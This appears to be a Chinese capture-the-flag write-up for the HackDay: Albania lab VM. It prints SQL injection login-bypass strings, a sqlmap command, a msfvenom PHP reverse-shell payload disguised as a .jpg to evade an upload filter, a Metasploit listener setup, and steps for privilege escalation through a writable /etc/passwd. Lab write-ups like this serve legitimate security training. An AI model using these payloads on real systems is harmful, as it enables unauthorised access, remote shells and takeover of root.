概述: Name: HackDay: Albania Date release: 18 Nov 2016 Author: R-73eN Series: HackDay
下载: https://download./hackday/HackDay-Albania.ova
nmap扫描探测 Mr . robot ╰─ dirb http://10.10.202.133:8008/ 挨着尝试访问,最后/unisxcudkqjydw/ 这个比较有价值
尝试SQLmap盲注跑一波 尝试抓包: POST /unisxcudkqjydw/vulnbank/client/login.php HTTP/1.1 Host: 10.10.202.133:8008 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://10.10.202.133:8008/unisxcudkqjydw/vulnbank/client/login Cookie: SESS93de7c0ce497c83093bc4a5806deade0=d66ig2hk5ufi6rr3o8dsjr8pf2; PHPSESSID=ue38kb5dtgl000bheit23llit7 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 27
username=admin&password=123456
╰─ sqlmap -r 1.txt --level=5
Username: admin' Password: admin MySQL中的注释符, # -- Username: ' or '1' = '1 Password: ' or '1' = '1 Username: ' or 'aucc' = 'aucc';# password: 为空,或者随便填写 Select * from users where username='$username' and password='$passwrod' Select * from users where username='' or 'aucc' = 'aucc';#' and password='' Select * from users where username='' or 'aucc' = 'aucc'; #永远为真
Username: admin' or 'admin'='admin' -- Password: '# Select * from users where username='$username' and password='$passwrod' Select * from users where username='admin' or 'admin'='admin' --' and password=''#' Select * from users where username='admin' or 'admin'='admin' and password='' #永远为真 上传PHP脚本文件,提示:After we got hacked we our allowing only image files to upload such as jpg , jpeg , bmp etc.
这是使用PHP反弹shell ╰─ msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.202.135 lport=444 -f raw > hack404.jpg msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 10.10.202.135 msf5 exploit(multi/handler) > set lport 4444 msf5 exploit(multi/handler) > show options 提权 寻找可写文件 find / -writable -type f 2>/dev/null /etc/passwd ╰─ openssl passwd -1 -salt hack404 Password: $1$hack404$N5Uuhmgb2KCDq5X8GxB7V0
|
|